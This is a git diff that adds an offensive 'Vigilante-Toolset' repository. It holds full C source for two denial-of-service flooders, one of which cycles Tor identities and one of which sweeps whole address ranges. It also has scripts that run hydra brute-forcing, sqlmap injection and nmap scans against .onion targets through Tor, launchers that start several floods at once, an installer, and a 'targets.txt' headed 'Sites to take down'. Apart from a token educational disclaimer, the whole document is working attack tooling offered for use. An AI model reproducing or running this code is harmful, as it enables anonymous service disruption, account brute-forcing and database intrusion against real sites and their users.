8080 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -S 8080 -f -q -t $THREADS -e ns -m / +fi + +if [ -z "$port_8100" ] +then + echo -e "$COLOR1 + -- --=[Port 8100 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8100 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -S 8100 -f -q -t $THREADS -e ns -m / +fi + +echo "" +echo -e "$COLOR3################################### Done! ###########################################$RESET" +exit 0 +# BruteX by @xer0dayz +# http://xerosecurity.co diff --git a/bruTOR.sh b/bruTOR.sh new file mode 100644 index 0000000..227404d --- /dev/null +++ b/bruTOR.sh @@ -0,0 +1,8 @@ +#!/bin/bash +echo "Use Nmap, menu 1 option 3, to see open ports." +echo "Ports like: 8000 or 80, 21, 22, 443; 8080," +echo +echo "Enter PORT:" +read vartport +sudo /home/binbash/Vigilante-Toolset/bruTOR 127.0.0.1 $varport +read -p "Press [Enter] key to start backup..." diff --git a/cDDoS b/cDDoS new file mode 100644 index 0000000000000000000000000000000000000000..af0cd173152ee035c798eb68d5bfff8f1f0efd5f GIT binary patch literal 18048 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 +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int Threads = 0; +int Connections = 0; + +int make_socket(char *host, char *port, int modus) +{ + struct addrinfo hints, *servinfo, *p; + int sock, r; + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + + if(modus) + hints.ai_socktype = SOCK_STREAM;//TCP + else + hints.ai_socktype = SOCK_DGRAM;//UDP + + if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) + { + fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); + exit(0); + } + for(p = servinfo; p != NULL; p = p->ai_next) + { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) + continue; + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) + { + close(sock); + continue; + } + break; + } + if(p == NULL) + { + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "No connection could be made: %s\n", host); + exit(0); + } + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "[Connected -> %s:%s]\n", host, port); + return sock; +} + +void broke(int s) +{ + // do nothing +} + +void attack(char *host, char *port, int id, int modus) +{ + int sockets; + int r, i, n, buf; + int x = 0; + char string[100]; + static int j = 0; + char httpbuf[2024]; + char s_copy[132]; + + sockets = 0; + signal(SIGPIPE, &broke); + + while(1) + { + x = 0; + while(x != Connections) + { + if(sockets == 0) + sockets = make_socket(host, port, modus); + + srand(time(NULL)); + for( j = 0; j < 99; j++) + string[j] = 'A' + rand()%26; // starting on '0', ending on '}' + + sprintf(httpbuf, "GET /%s HTTP/1.0\r\n\r\n", string); + strncpy(s_copy, httpbuf, sizeof(s_copy)); + int sizebuf = sizeof s_copy - 1; + r=write(sockets, s_copy, sizebuf); + close(sockets); + sockets = make_socket(host, port, modus); + fprintf(stderr, "Thread:%i Connection:%d %s", id,x,s_copy); + x++; + } + usleep(100000); + } +} +int force(char *host, int modus, char *port) +{ + char *i; + char *p; + int stelle; + int x = 0; + + p = host; + i = strrchr(host, 46); + stelle = (i - p) + 1; + + if(host[stelle] != '\0') + return 0; + + for(int l=0; l <= 2; l++) + { + if(l != 0) + host[stelle] = 48 + l; + for(int k=0; k <= 9; k++) + { + if(k != 0 && l == 0) + host[stelle] = 48 + k; + if(k != 0 && l != 0) + host[stelle + 1] = 48 + k; + if(k == 0 && l != 0) + host[stelle + 1] = 48 + k; + if(l == 2 && k == 6) + break; + for(int j=48; j <= 57; j++) + { + if(k == 0 && l == 0) + host[stelle] = j; + else if(l == 0 && k != 0) + host[stelle + 1] = j; + else + host[stelle + 2] = j; + if(l == 2 && k == 5 && j == 53) + break; + while(x != Threads) + { + printf("Start IP: %s\n", host); + ++x; + if(fork()) + attack(host, port, x, modus); + usleep(100000); + } + x = 0; + } + } + } +} +int main(int argc, char **argv) +{ + int x = 0; + int modus; + char ip[30]; + char port[6]; + + printf("!!This tool is for educational purposes, I take no responsibility for its misuse!!\n"); + printf("Modus:MemAMPDDoD by: M.B. Hudson (hose from 0 to 3) =====> 0=UDP 1=TCP with HTTP Requests\n"); + scanf("%d", &modus); + printf("ENTER IP or TARGET or Brute Force a range by added /24 at the end of TARGET URL =====>\n"); + scanf("%s", &ip); + printf("ENTER ATTACK Port =====>\n"); + scanf("%s",&port); + printf("How Many Connections? (example: 20) ======>\n"); + scanf("%d",&Connections); + printf("How Many Thread Per Connection? =====> \n"); + scanf("%d",&Threads); + + if(!(force(ip, modus, port))) + { + while(x != Threads) + { + ++x; + if(fork()) + attack(ip, port, x, modus); + usleep(100000); + } + } + getc(stdin); + return 0; +} diff --git a/cport.sh b/cport.sh new file mode 100644 index 0000000..d6fdc50 --- /dev/null +++ b/cport.sh @@ -0,0 +1,16 @@ +#!/bin/bash +echo "Connecting to TOR." +service tor start +clear +echo ""CONNECTED TO TOR!"" +echo "Starting Docker" +service docker start +clear +echo "DOCKER STARTED!" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "-p 21,22,23,25,80,135,139,443,8080,8000,9050,4444 wwfmgeecv2aflaopqvfdad.onion" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET:" +read vartarget +sudo docker run --rm -it milesrichardson/onion-nmap $vartarget +read -p "Press [Enter] key to start backup..." diff --git a/cproxy.sh b/cproxy.sh new file mode 100644 index 0000000..5b9e25a --- /dev/null +++ b/cproxy.sh @@ -0,0 +1,31 @@ +#!/bin/bash +echo Connecting to TOR. +service tor start +clear +echo Connecting to TOR.. +sleep .4 +clear +echo Connecting to TOR... +sleep .4 +clear +echo Connecting to TOR.... +sleep .4 +sleep +echo Connecting to TOR..... +clear +echo -e "\e[5m!!!Please keep this terminal running in order to maintain connections to TOR & proxy server!!!" +echo -e "\e[0m" + + +echo -e "\e[45m-----= Minimizing the terminal is suggested =-----" +echo -e "\e[0m" +echo -e "Connecting to TOR...... \e[5mCONNECTED!" +echo -e "\e[0m" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "example: jhef7rge64g47fh4dd4h.onion:80" +echo "If attacking a SQL server use something like http://site.com/vuln.php?id=1:80" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET URL:" +read vartarget +sudo socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:$vartarget,socksport=9050 + diff --git a/ddos b/ddos new file mode 100644 index 0000000000000000000000000000000000000000..deaebab3bb7283545fb5eafcc4396cc5e1cb320f GIT binary patch literal 17560 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 A6#xJL literal 0 HcmV?d00001 diff --git a/ddos.c b/ddos.c new file mode 100644 index 0000000..d1f81e0 --- /dev/null +++ b/ddos.c @@ -0,0 +1,100 @@ +/* XerXes - Most powerful dos tool */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int make_socket(char *host, char *port) { + struct addrinfo hints, *servinfo, *p; + int sock, r; +// fprintf(stderr, "[Connecting -> %s:%s\n", host, port); + memset(&hints, 0, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { + fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); + exit(0); + } + for(p = servinfo; p != NULL; p = p->ai_next) { + if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { + continue; + } + if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { + close(sock); + continue; + } + break; + } + if(p == NULL) { + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "No connection could be made\n"); + exit(0); + } + if(servinfo) + freeaddrinfo(servinfo); + fprintf(stderr, "[Connected -> %s:%s]\n", host, port); + return sock; +} + +void broke(int s) { + // do nothing +} + +#define CONNECTIONS 8 +#define THREADS 48 + +void attack(char *host, char *port, int id) { + int sockets[CONNECTIONS]; + int x, g=1, r; + for(x=0; x!= CONNECTIONS; x++) + sockets[x]=0; + signal(SIGPIPE, &broke); + while(1) { + for(x=0; x != CONNECTIONS; x++) { + if(sockets[x] == 0) + sockets[x] = make_socket(host, port); + r=write(sockets[x], "\0", 1); + if(r == -1) { + close(sockets[x]); + sockets[x] = make_socket(host, port); + } else +// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); + fprintf(stderr, "[%i: Voly Sent]\n", id); + } + fprintf(stderr, "[%i: Voly Sent]\n", id); + usleep(300000); + } +} + +void cycle_identity() { + int r; + int socket = make_socket("localhost", "9050"); + write(socket, "AUTHENTICATE \"\"\n", 16); + while(1) { + r=write(socket, "signal NEWNYM\n\x00", 16); + fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); + usleep(300000); + } +} + +int main(int argc, char **argv) { + int x; + if(argc !=3) + cycle_identity(); + for(x=0; x != THREADS; x++) { + if(fork()) + attack(argv[1], argv[2], x); + usleep(200000); + } + getc(stdin); + return 0; +} diff --git a/ddos.sh b/ddos.sh new file mode 100644 index 0000000..9fef12a --- /dev/null +++ b/ddos.sh @@ -0,0 +1,21 @@ +#!/bin/bash +clear +echo "=====================================================================" +echo "EtherApe is a visual tool that will show you information such as" +echo "what you are attacking and at what rate you are attacking." +echo "--------------------------------------------------------------------" +sleep 1.5 +echo "You may also run this script more than once at the same time" +echo "in an effort to be more effective; or choose menu 2 option 6" +echo "====================================================================" +echo +echo +echo +echo "____________________________________________________________________" +echo "Use Nmap, menu 1 option 3, to see open ports." +echo "Ports like: 8000 or 80, 21, 22, 443; 8080," +echo +echo +echo "Enter PORT:" +read varport +sudo /home/binbash/Vigilante-Toolset/ddos 127.0.0.1 $varport diff --git a/ddos8000.sh b/ddos8000.sh new file mode 100644 index 0000000..cff26e4 --- /dev/null +++ b/ddos8000.sh @@ -0,0 +1 @@ +sudo /home/binbash/Vigilante-Toolset/ddos 127.0.0.1 8000 diff --git a/ddosx4.sh b/ddosx4.sh new file mode 100644 index 0000000..fe65359 --- /dev/null +++ b/ddosx4.sh @@ -0,0 +1,7 @@ +#!/usr/bin/env bash +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" & +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" & +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" & +sudo terminator -e "sudo /home/binbash/Vigilante-Toolset/ddos8000.sh" + + diff --git a/install.sh b/install.sh new file mode 100644 index 0000000..7862e12 --- /dev/null +++ b/install.sh @@ -0,0 +1,45 @@ +sudo apt-get update +sudo apt-get install terminator -y +sudo apt-get install nikto -y +sudo apt-get install python3 -y +sudo apt-get install python3-pip -y +sudo apt-get install sqlmap -y +sudo apt-get install uniscan -y +sudo apt-get install socat -y +sudo apt-get install hydra -y +sudo apt-get install tor -y +sudo apt-get install nmap -y +sudo apt-get install torbrowser-launcher -y +sudo apt-get install etherape -y +sudo apt install proxychains4 -y +sudo apt install docker +sudo apt install docker.io +sudo gcc ddos.c -o ddos +sudo gcc cDDoS.c -o cDDoS +sudo chmod +x proxy.sh +sudo chmod +x cproxy.sh +sudo chmod +x bruTOR.sh +sudo chmod +x bruTOR +sudo chmod +x cport.sh +sudo chmod +x ddos.sh +sudo chmod +x ddos8000.sh +sudo chmod +x ddosx4.sh +sudo chmod +x nmap.sh +sudo chmod +x proxy.sh +sudo chmod +x run.sh +sudo chmod +x sql.sh +sudo chmod +x TorHunter +echo "PLEASE ENTER THE USERNAME OF THE SESSION YOU ARE CURRENTLY LOGGED IN AS:" +echo " YOUR USERNAME IS PROBABLY:" "$USER" +read varusername +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' TorHunter +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' bruTOR.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' cport.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' cproxy.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' ddos.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' ddos8000.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' ddosx4.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' nmap.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' proxy.sh +sudo sed -i 's+YOUR_USER_NAME+'$varusername'+' sql.sh +sudo ./TorHunter diff --git a/nmap.sh b/nmap.sh new file mode 100644 index 0000000..a0b676b --- /dev/null +++ b/nmap.sh @@ -0,0 +1,15 @@ +#!/bin/bash +echo Connecting to TOR. +sudo service tor start +clear +CONNECTED TO TOR! +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "example: jhef7rge64g47fh4dd4h.onion" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET URL:" +read vartarget +sudo proxychains4 nmap -Pn -sT -v $vartarget +read -p "Press [Enter] key to start backup..." + + + diff --git a/proxy.sh b/proxy.sh new file mode 100644 index 0000000..b14e4c4 --- /dev/null +++ b/proxy.sh @@ -0,0 +1,33 @@ +#!/bin/bash +echo Connecting to TOR. +sudo service tor start +clear +echo Connecting to TOR.. +sleep .4 +clear +echo Connecting to TOR... +sleep .4 +clear +echo Connecting to TOR.... +sleep .4 +sleep +echo Connecting to TOR..... +clear +echo -e "\e[5m!!!Please keep this terminal running in order to maintain connections to TOR & proxy server!!!" +echo -e "\e[0m" + + +echo -e "\e[45m-----= Minimizing the terminal is suggested =-----" +echo -e "\e[0m" +echo -e "Connecting to TOR...... \e[5mCONNECTED!" +echo -e "\e[0m" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "example: jhef7rge64g47fh4dd4h.onion" +echo "If attacking a SQL server use something like http://www.site.com/vuln.php?id=1" +echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +echo "Enter TARGET URL:" +read vartarget +sudo socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:$vartarget:80,socksport=9050 + + + diff --git a/run.sh b/run.sh new file mode 100644 index 0000000..f232af3 --- /dev/null +++ b/run.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +export PATH="/custom/bin:$PATH" + +arg_in_path() { + which "$1" >/dev/null 2>&1 && return 0 + return 1 +} + +arg_is_cmd() { + test -x "$1" && return 0 || return 1 +} + +arg_is_executable() { + if arg_in_path "$1" ; then + return 0 + elif arg_is_cmd "$1" ; then + return 0 + else + return 1 + fi +} + +tor_boot + +if test -z "$1" ; then + echo "No arguments given to run, launching /bin/sh..." + exec /bin/sh +elif arg_is_executable "$1" ; then + echo "[nmap onion]" "$@" + exec "$@" +else + echo "[nmap onion] nmap" "$@" + exec "nmap" "$@" +fi diff --git a/sql.sh b/sql.sh new file mode 100644 index 0000000..117b929 --- /dev/null +++ b/sql.sh @@ -0,0 +1,8 @@ +#!/bin/bash +echo "example: http://www.site.com/vuln.php?id=1" +echo "ENTER TARGET URL:" +read vartarget +sudo sqlmap -u $vartarget --tor --time-sec 20 --crawl=2 --random-agent +read -p "Press [Enter] key to start backup..." + + diff --git a/targets.txt b/targets.txt new file mode 100644 index 0000000..7de1c0c --- /dev/null +++ b/targets.txt @@ -0,0 +1,3 @@ +<><><><><><><><><> +Sites to take down +<><><><><><><><><>